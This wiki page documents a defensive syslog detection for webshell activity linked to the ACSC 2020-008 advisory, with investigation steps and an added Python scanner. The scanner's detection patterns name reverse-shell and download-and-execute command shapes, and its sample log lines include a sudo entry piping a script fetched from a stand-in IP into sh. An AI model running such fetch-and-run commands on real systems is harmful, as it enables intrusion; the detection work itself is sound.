
Linux Logs [0.1]

Nick Klein edited this page Sep 14, 2020 · 3 revisions

Findings from this artefact are suspicious syslog entries that may indicate webshell activity, or attempted access from known malicious origins.

Overview

This search aims to identify entries in syslog files that may indicate webshell activity on the web server, or attempts by specific known attackers to connect to it.

A webshell is a malicious script uploaded by an attacker to a web server, which the attacker then uses to execute commands on the server remotely and to launch further attacks.

Detection Approach

This scan parses syslog files for suspicious entries that may indicate attacker activity, including specific commands characteristic of a webshell being used. Many webshell variants exist, but they share a common pattern: a file is uploaded to a web server to give the attacker remote command execution, which is then used to establish a foothold, escalate privileges or maintain persistence on the system.

This search looks for log entries that may suggest the presence of the webshells identified in the ACSC 2020-008 advisory, using intelligence released by the ACSC as TLP:WHITE and by other sources such as CyberCX and CrowdStrike investigations. See the Threat Intelligence Sources section below for further details.

Findings are derived from threat intelligence, and do not consider factors specific to your computer or network environment.

Detection Artefact

Packs.CyberCX.Linux.Logs

Threat Intelligence Sources

The threat intelligence sources used to develop these detections include:

Interpreting the Results

A finding does not by itself confirm compromise of your system, but it may well indicate attacker activity. Review each detection in context to determine whether the finding is malicious or a false positive. Guidance on how to approach these investigations is provided in this section.

Investigations

This section provides general guidance on how to determine whether a finding indicates malicious activity. Refer to the specific detection results in the report generated by CCX Digger when conducting the investigation, as some of the content below may not apply to your system.

These guides do not consider context such as the environment, the applications in use and the activity expected of the computer. The review should weigh what activity is expected against the suspicious log entry detection results.

Suspicious Linux Log Entry

The entries identified should be investigated further to confirm the origin and context of the event. The following should be performed:

  • Where a username is present, confirm that the behaviour is expected for that user's role and intended function

If the event was unexpected, or its origin is unknown, take further action to determine what was performed.

Further Actions

The following activities should be performed to determine if an attack may have occurred:

  • Check whether the event was successful (for example, whether a login was accepted or a command was permitted rather than refused).
  • Identify any information that may have been returned and investigate what it relates to. This could include specific host details, user accounts or directories.
  • Investigate the command issued and the connecting IP address further to determine whether either is associated with known attacks, vulnerabilities or threat groups.
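The detection approach described above and the further actions listed here, as an added example (editor's code, not the Packs.CyberCX.Linux.Logs artefact): it parses constructed syslog lines, flags command shapes characteristic of a webshell and connections from a constructed known-bad IP list, records whether each event succeeded, and orders the hits for triage. The indicator patterns, the KNOWN_BAD_IPS set (TEST-NET addresses) and the sample lines are assumptions for illustration, not ACSC or CyberCX intelligence.

```python
"""Scan syslog-style lines for webshell command indicators and known-bad
origins, then order the hits for triage.  Added example for this wiki page;
it is not the Packs.CyberCX.Linux.Logs artefact itself.  The indicator set
and the log lines are constructed for the example."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed indicator set using TEST-NET addresses (not ACSC or CyberCX data).
KNOWN_BAD_IPS = {"203.0.113.7", "198.51.100.23"}

# Accounts that normally run the web server; sudo use by them is the classic
# sign of commands being issued through a webshell.
WEB_SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "httpd"}

# Command shapes characteristic of post-upload webshell activity (assumed
# indicators chosen by the editor, not the artefact's own rule set).
COMMAND_INDICATORS = [
    ("download-and-execute", re.compile(r"\b(wget|curl)\b.*?(\s-[oO]\b|\|\s*(ba)?sh\b)")),
    ("encoded-payload", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("reverse-shell", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s|/dev/tcp/|python[23]?\s+-c\s.*\bsocket\b")),
    ("staging-in-tmp", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\s+/(tmp|dev/shm)/")),
]

# rsyslog default line layout: "Mon DD HH:MM:SS host proc[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s+(?P<host>\S+)\s+"
    r"(?P<proc>[\w./-]+)(?:\[\d+\])?:\s(?P<msg>.*)$"
)
SUDO_RE = re.compile(r"^\s*(?P<user>\S+)\s*:\s.*?\bUSER=(?P<target>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$")
SSHD_RE = re.compile(
    r"^(?P<result>Accepted|Failed)\s+\S+\s+for\s+(?:invalid user\s+)?(?P<user>\S+)\s+from\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


@dataclass
class Finding:
    line_no: int
    process: str
    user: Optional[str]
    ip: Optional[str]
    succeeded: Optional[bool]          # None when the log line does not say
    indicators: List[str] = field(default_factory=list)
    raw: str = ""


def scan_syslog(lines: List[str]) -> List[Finding]:
    """Return one Finding per line that carries at least one indicator."""
    findings: List[Finding] = []
    for n, raw in enumerate(lines, start=1):
        m = SYSLOG_RE.match(raw)
        if not m:
            continue
        proc, msg = m.group("proc"), m.group("msg")
        finding = None
        if proc == "sudo":
            s = SUDO_RE.match(msg)
            if s:
                cmd = s.group("cmd")
                indicators = ["service-account-sudo"] if s.group("user") in WEB_SERVICE_ACCOUNTS else []
                indicators += [name for name, rx in COMMAND_INDICATORS if rx.search(cmd)]
                bad_ips = [ip for ip in IPV4_RE.findall(cmd) if ip in KNOWN_BAD_IPS]
                if bad_ips:
                    indicators.append("known-bad-origin")
                # sudo logs the COMMAND for refused requests too, but says so explicitly.
                denied = "NOT in sudoers" in msg or "incorrect password" in msg
                finding = Finding(n, proc, s.group("user"), bad_ips[0] if bad_ips else None,
                                  not denied, indicators, raw)
        elif proc == "sshd":
            s = SSHD_RE.match(msg)
            if s:
                indicators = ["known-bad-origin"] if s.group("ip") in KNOWN_BAD_IPS else []
                finding = Finding(n, proc, s.group("user"), s.group("ip"),
                                  s.group("result") == "Accepted", indicators, raw)
        if finding is not None and finding.indicators:
            findings.append(finding)
    return findings


def prioritise(findings: List[Finding]) -> List[Finding]:
    """Order as the Further Actions list suggests: successful events first,
    known-bad origins before command-only hits, then log order."""
    return sorted(findings, key=lambda f: (f.succeeded is not True,
                                           "known-bad-origin" not in f.indicators,
                                           f.line_no))


# Constructed sample log lines for the example (not real host data).
SAMPLE_SYSLOG = """\
Sep 14 10:01:22 web01 sshd[1204]: Failed password for root from 203.0.113.7 port 51122 ssh2
Sep 14 10:01:30 web01 sshd[1206]: Accepted publickey for deploy from 192.0.2.10 port 40022 ssh2
Sep 14 10:03:11 web01 sudo:  www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/bin/bash -c curl -s http://198.51.100.23/x.sh | sh
Sep 14 10:03:40 web01 sudo:  www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/bin/chmod +x /tmp/.cache/agent
Sep 14 10:04:02 web01 sudo:  www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/base64 -d /tmp/p.b64
Sep 14 10:05:01 web01 CRON[1300]: (root) CMD (/usr/bin/apt-get update -q)
Sep 14 10:06:15 web01 sshd[1350]: Accepted password for admin from 203.0.113.7 port 51190 ssh2
""".splitlines()

if __name__ == "__main__":
    for f in prioritise(scan_syslog(SAMPLE_SYSLOG)):
        state = {True: "succeeded", False: "failed", None: "unknown"}[f.succeeded]
        print(f"line {f.line_no} {f.process:5} user={f.user} ip={f.ip} {state}: {', '.join(f.indicators)}")
```

The ordering matters for triage: a successful sudo from www-data that fetches and pipes a script from a known-bad address, and an accepted login from the same origin, come out ahead of the refused base64 attempt, even though all three are worth reviewing. Extend KNOWN_BAD_IPS from the advisory's indicators and add web server access logs before relying on it against a real host.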

References

Need Help?

If you have followed the investigations to confirm the validity of the findings, and believe your system may be at risk, please visit the Need Help? page for further instructions. Please refer to the same page for further context on how to use this wiki.

Revision History

[v0.1]: